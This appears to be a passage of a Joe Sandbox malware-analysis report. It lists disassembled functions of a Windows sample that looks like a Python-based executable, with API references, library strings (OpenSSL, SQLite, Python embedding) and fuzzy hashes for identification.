Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
String ID: %s\*
API String ID: 1057558799-766152087
Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
Instruction ID: d097f9422ff17ccd52add64778dbe7a2ad092627c8b647c71697cb2f7b283298
Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
Instruction Fuzzy Hash: C3416521A0CA6685EE709F68E4491BE6362FB94755F400272EF9DC36D4EF3CD545C740

Function 00007FFDFB0C7336 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 332COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00007FFDFB0C759B
0123456789ABCDEF0123456789abcdef, xrefs: 00007FFDFB0C7529
VUUU, xrefs: 00007FFDFB0C746E
-x0, xrefs: 00007FFDFB0C7606

Memory Dump Source

Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true

Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd

Similarity

API ID:
String ID: -x0$0123456789ABCDEF0123456789abcdef$VUUU$VUUU
API String ID: 0-2031831958
Opcode ID: 27ee5c829f6d79043f4cbad637b212a471c0560ebe4aff584a080aef168f4e0b
Instruction ID: 8394c9a233799e7e54f9d67e0ba715d190cc7eefee7a017f120b9e4635b32898
Opcode Fuzzy Hash: 27ee5c829f6d79043f4cbad637b212a471c0560ebe4aff584a080aef168f4e0b
Instruction Fuzzy Hash: FCD124A2B1E68386DB248B249064F7D7B95FB56784F4A4035DE6E437E9DF2CE800E700

Function 00007FFDFAAB212B Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FFDFAB2F3A0
RtlCaptureContext.KERNEL32 ref: 00007FFDFAB2F3CD
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFDFAB2F3E7
RtlVirtualUnwind.KERNEL32 ref: 00007FFDFAB2F428
IsDebuggerPresent.KERNEL32 ref: 00007FFDFAB2F47C
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFDFAB2F499
UnhandledExceptionFilter.KERNEL32 ref: 00007FFDFAB2F4A4

Memory Dump Source

Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true

Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 42b55a9a064fc9b9eecda881d5f6a8203af3c995eb229b08bbbd6dd66c50bcf0
Instruction ID: b145c5f2a5afa8f64978e50b9800baffaf378b23a07dbfb77271a805afecb553
Opcode Fuzzy Hash: 42b55a9a064fc9b9eecda881d5f6a8203af3c995eb229b08bbbd6dd66c50bcf0
Instruction Fuzzy Hash: 9E313C72709A8186EB648F60E8507ED73A0FB88744F84447ADA6E47B99DF3CD548C710

Function 00007FF6BA3AD12C Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF6BA3AD148
RtlCaptureContext.KERNEL32 ref: 00007FF6BA3AD175
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6BA3AD18F
RtlVirtualUnwind.KERNEL32 ref: 00007FF6BA3AD1D0
IsDebuggerPresent.KERNEL32 ref: 00007FF6BA3AD224
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6BA3AD241
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6BA3AD24C

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
Instruction ID: 2a263cee899eb05c8893552b5cfa0bc6d4b8e3c0ba065ec74635e73e455b4807
Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
Instruction Fuzzy Hash: 53313E72A08B918AEB609F64E8803EE7365FB84744F44407ADB4E87B98EF3CD548C710

Function 00007FF6BA3C5C00 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF6BA3C5C45

Part of subcall function 00007FF6BA3C5598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3C55AC

Part of subcall function 00007FF6BA3BA948: HeapFree.KERNEL32(?,?,?,00007FF6BA3C2D22,?,?,?,00007FF6BA3C2D5F,?,?,00000000,00007FF6BA3C3225,?,?,?,00007FF6BA3C3157), ref: 00007FF6BA3BA95E
Part of subcall function 00007FF6BA3BA948: GetLastError.KERNEL32(?,?,?,00007FF6BA3C2D22,?,?,?,00007FF6BA3C2D5F,?,?,00000000,00007FF6BA3C3225,?,?,?,00007FF6BA3C3157), ref: 00007FF6BA3BA968

Part of subcall function 00007FF6BA3BA900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6BA3BA8DF,?,?,?,?,?,00007FF6BA3BA7CA), ref: 00007FF6BA3BA909
Part of subcall function 00007FF6BA3BA900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6BA3BA8DF,?,?,?,?,?,00007FF6BA3BA7CA), ref: 00007FF6BA3BA92E

_get_daylight.LIBCMT ref: 00007FF6BA3C5C34

Part of subcall function 00007FF6BA3C55F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3C560C

_get_daylight.LIBCMT ref: 00007FF6BA3C5EAA
_get_daylight.LIBCMT ref: 00007FF6BA3C5EBB
_get_daylight.LIBCMT ref: 00007FF6BA3C5ECC
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6BA3C610C), ref: 00007FF6BA3C5EF3

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID:
API String ID: 4070488512-0
Opcode ID: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
Instruction ID: f298a274bc8e03f4046c82add987d87bd82ab5ba2314ab19afe7e84179069e03
Opcode Fuzzy Hash: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
Instruction Fuzzy Hash: ECD1D022E1876286E720EF2ADC411B96761EF84784F848176EF4EC7696EF3DE841C740

Function 00007FF6BA3BA614 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF6BA3BA68D
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6BA3BA6A5
RtlVirtualUnwind.KERNEL32 ref: 00007FF6BA3BA6E0
IsDebuggerPresent.KERNEL32 ref: 00007FF6BA3BA719
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6BA3BA723
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6BA3BA72E

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
Instruction ID: 55eea416681c13cdf040abc439ccdb9edd9fdaa6947950bc24db9b922e97bd58
Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
Instruction Fuzzy Hash: 88313B36A18F8186DB608F29E8402AE73A5FB88758F540275EF9D83B95EF3CD145CB00

Function 00007FFDFAAB1CBC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 292COMMON

Download Yara Rule

Strings

tls_construct_new_session_ticket, xrefs: 00007FFDFAB26DCD, 00007FFDFAB26E7E, 00007FFDFAB27009, 00007FFDFAB27083
construct_stateful_ticket, xrefs: 00007FFDFAB2715B
resumption, xrefs: 00007FFDFAB26EC3
..\s\ssl\statem\statem_srvr.c, xrefs: 00007FFDFAB26DD9, 00007FFDFAB26E8A, 00007FFDFAB26FA3, 00007FFDFAB26FC3, 00007FFDFAB27015, 00007FFDFAB2708F, 00007FFDFAB27167

Memory Dump Source

Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true

Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd

Similarity

API ID:
String ID: ..\s\ssl\statem\statem_srvr.c$construct_stateful_ticket$resumption$tls_construct_new_session_ticket
API String ID: 0-1194634662
Opcode ID: d7c51ff00aa3bb62bc4b7c529fdc1557d19d858cb9888e3d1740cde6f66a3c2f
Instruction ID: 32e2621254763f4432b7cef65eee20f0d22c2ed41fde64006b3565bb993ef469
Opcode Fuzzy Hash: d7c51ff00aa3bb62bc4b7c529fdc1557d19d858cb9888e3d1740cde6f66a3c2f
Instruction Fuzzy Hash: B7D19021B0868281F71ADB65D460BE967A0FB86B88F8440B7ED6C4BBDEDE3DD545C310

Function 00007FF6BA3C1874 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3C18C0
FindFirstFileExW.KERNEL32 ref: 00007FF6BA3C19CA

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
Instruction ID: 77ecde02e2222b3ce888ce6eec87bfb90815eca06c682fd3ad276086d19994d0
Opcode Fuzzy Hash: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
Instruction Fuzzy Hash: 39B1B326B18BA642EA61DB2A99001B9A391EB84BE4F445172EF5DC7BC5FF3CE441D700

Function 00007FFDFAAB1EE2 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 470COMMON

Download Yara Rule

APIs

00007FFE1FFB08A0.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFDFAB0CCF4

Strings

tls_parse_ctos_psk, xrefs: 00007FFDFAB0CE7A, 00007FFDFAB0CECD, 00007FFDFAB0CFFB, 00007FFDFAB0D0D6, 00007FFDFAB0D135
D:\a\1\s\include\internal/packet.h, xrefs: 00007FFDFAB0CAE9, 00007FFDFAB0CAFD
..\s\ssl\statem\extensions_srvr.c, xrefs: 00007FFDFAB0CB37, 00007FFDFAB0CE86, 00007FFDFAB0CED4, 00007FFDFAB0D002, 00007FFDFAB0D0DD, 00007FFDFAB0D13C

Memory Dump Source

Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true

Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd

Similarity

API ID: 00007
String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\include\internal/packet.h$tls_parse_ctos_psk
API String ID: 3568877910-3130753023
Opcode ID: bb6fdb0651d5f52247cd78fcf81d5255b842004060db7846350dbb3ed1d0d898
Instruction ID: cf95e55b9c7f3dc9d37e021c5e7c8a02221f5d4fdc6fb27b1bb60c3df5bddc37
Opcode Fuzzy Hash: bb6fdb0651d5f52247cd78fcf81d5255b842004060db7846350dbb3ed1d0d898
Instruction Fuzzy Hash: 6912E262B0869241F7189B61D468ABD6790FF82BC4F888072DE6D47BDEDF3CE5458740

Function 00007FF6BA3C5E7C Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF6BA3C5EAA

Part of subcall function 00007FF6BA3C55F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3C560C

_get_daylight.LIBCMT ref: 00007FF6BA3C5EBB

Part of subcall function 00007FF6BA3C5598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3C55AC

_get_daylight.LIBCMT ref: 00007FF6BA3C5ECC

Part of subcall function 00007FF6BA3C55C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3C55DC

Part of subcall function 00007FF6BA3BA948: HeapFree.KERNEL32(?,?,?,00007FF6BA3C2D22,?,?,?,00007FF6BA3C2D5F,?,?,00000000,00007FF6BA3C3225,?,?,?,00007FF6BA3C3157), ref: 00007FF6BA3BA95E
Part of subcall function 00007FF6BA3BA948: GetLastError.KERNEL32(?,?,?,00007FF6BA3C2D22,?,?,?,00007FF6BA3C2D5F,?,?,00000000,00007FF6BA3C3225,?,?,?,00007FF6BA3C3157), ref: 00007FF6BA3BA968

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6BA3C610C), ref: 00007FF6BA3C5EF3

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 3458911817-0
Opcode ID: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
Instruction ID: e9805c4be31e5b39c27ff3516daa43b4c3e82a988c4f31863cc655d583939484
Opcode Fuzzy Hash: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
Instruction Fuzzy Hash: 72517F32E1876286E720DF2AEC815B96761FB88784F4451B6EF4EC7696EF3CE4418740

Function 00007FFDFB0DC380 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 377COMMON

Download Yara Rule

Strings

, xrefs: 00007FFDFB0DC40F
recovered %d frames from WAL file %s, xrefs: 00007FFDFB0DC8D8

Memory Dump Source

Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true

Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd

Similarity

API ID:
String ID: $recovered %d frames from WAL file %s
API String ID: 0-3175670447
Opcode ID: f49f594aa9776622e8017dc142b778ce45034937814b224cced9a4f2253ff34f
Instruction ID: aa5e6006817a3c0c0d7054b3623fa11b1a8352a0b316539b2a485ea965efb6ec
Opcode Fuzzy Hash: f49f594aa9776622e8017dc142b778ce45034937814b224cced9a4f2253ff34f
Instruction Fuzzy Hash: 1FF1C036B0978686E760DF25D050B6E77A0F789B88F014135EAAD87BE8DF38D845DB40

Function 00007FFDFAAB24DC Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 329COMMON

Download Yara Rule

APIs

00007FFE1FFB08A0.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFDFAB03366

Strings

tls_construct_ctos_psk, xrefs: 00007FFDFAB03302, 00007FFDFAB03476, 00007FFDFAB034E2, 00007FFDFAB0352A, 00007FFDFAB03736, 00007FFDFAB03774, 00007FFDFAB037AB
..\s\ssl\statem\extensions_clnt.c, xrefs: 00007FFDFAB0330E, 00007FFDFAB03482, 00007FFDFAB034EE, 00007FFDFAB03536, 00007FFDFAB03742, 00007FFDFAB03780, 00007FFDFAB037B7

Memory Dump Source

Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true

Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd

Similarity

API ID: 00007
String ID: ..\s\ssl\statem\extensions_clnt.c$tls_construct_ctos_psk
API String ID: 3568877910-446233508
Opcode ID: 7fb5678b9f67f08e663784aae6565b9e065ad5c58e2e1987a57ae2b77471c9e7
Instruction ID: 097a03915c9c9bd04c303d9326e136958decb221e2c39ff844ad5f019a768f2a
Opcode Fuzzy Hash: 7fb5678b9f67f08e663784aae6565b9e065ad5c58e2e1987a57ae2b77471c9e7
Instruction Fuzzy Hash: 97D1BF61B0C69341FB58AB229564FBE2694FF84BC4F9840B2DD2D47ACECF2DE5468740

Function 00007FF6BA3A5830 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A5840
GetLastError.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A5852
GetProcAddress.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A5889
GetLastError.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A589B
GetProcAddress.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A58B4
GetLastError.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A58C6
GetProcAddress.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A58DF
GetLastError.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A58F1
GetProcAddress.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A590D
GetLastError.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A591F
GetProcAddress.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A593B
GetLastError.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A594D
GetProcAddress.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A5969
GetLastError.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A597B
GetProcAddress.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A5997
GetLastError.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A59A9
GetProcAddress.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A59C5
GetLastError.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A59D7

Strings

PyImport_ExecCodeModule, xrefs: 00007FF6BA3A5C11, 00007FF6BA3A5C33
PyModule_GetDict, xrefs: 00007FF6BA3A5CC9, 00007FF6BA3A5CEB
PyUnicode_Join, xrefs: 00007FF6BA3A5FA9, 00007FF6BA3A5FCB
PyMem_RawFree, xrefs: 00007FF6BA3A5C9B, 00007FF6BA3A5CBD
PySys_GetObject, xrefs: 00007FF6BA3A5E67, 00007FF6BA3A5E89
PyConfig_SetBytesString, xrefs: 00007FF6BA3A5A17, 00007FF6BA3A5A39
PyErr_Fetch, xrefs: 00007FF6BA3A5ACF, 00007FF6BA3A5AF1
Py_DecodeLocale, xrefs: 00007FF6BA3A587F, 00007FF6BA3A58A1
GetProcAddress, xrefs: 00007FF6BA3A5868
PyObject_CallFunctionObjArgs, xrefs: 00007FF6BA3A5D25, 00007FF6BA3A5D47
Failed to get address for %hs, xrefs: 00007FF6BA3A5861
PyObject_Str, xrefs: 00007FF6BA3A5DAF, 00007FF6BA3A5DD1
PyConfig_Read, xrefs: 00007FF6BA3A59E9, 00007FF6BA3A5A0B
PyConfig_SetWideStringList, xrefs: 00007FF6BA3A5A73, 00007FF6BA3A5A95
PyErr_NormalizeException, xrefs: 00007FF6BA3A5AFD, 00007FF6BA3A5B1F
Py_PreInitialize, xrefs: 00007FF6BA3A595F, 00007FF6BA3A5981
PyStatus_Exception, xrefs: 00007FF6BA3A5E39, 00007FF6BA3A5E5B
Py_IsInitialized, xrefs: 00007FF6BA3A5931, 00007FF6BA3A5953
PyConfig_Clear, xrefs: 00007FF6BA3A598D, 00007FF6BA3A59AF
PyImport_ImportModule, xrefs: 00007FF6BA3A5C3F, 00007FF6BA3A5C61
PyConfig_InitIsolatedConfig, xrefs: 00007FF6BA3A59BB, 00007FF6BA3A59DD
PyErr_Print, xrefs: 00007FF6BA3A5B59, 00007FF6BA3A5B7B
PyErr_Occurred, xrefs: 00007FF6BA3A5B2B, 00007FF6BA3A5B4D
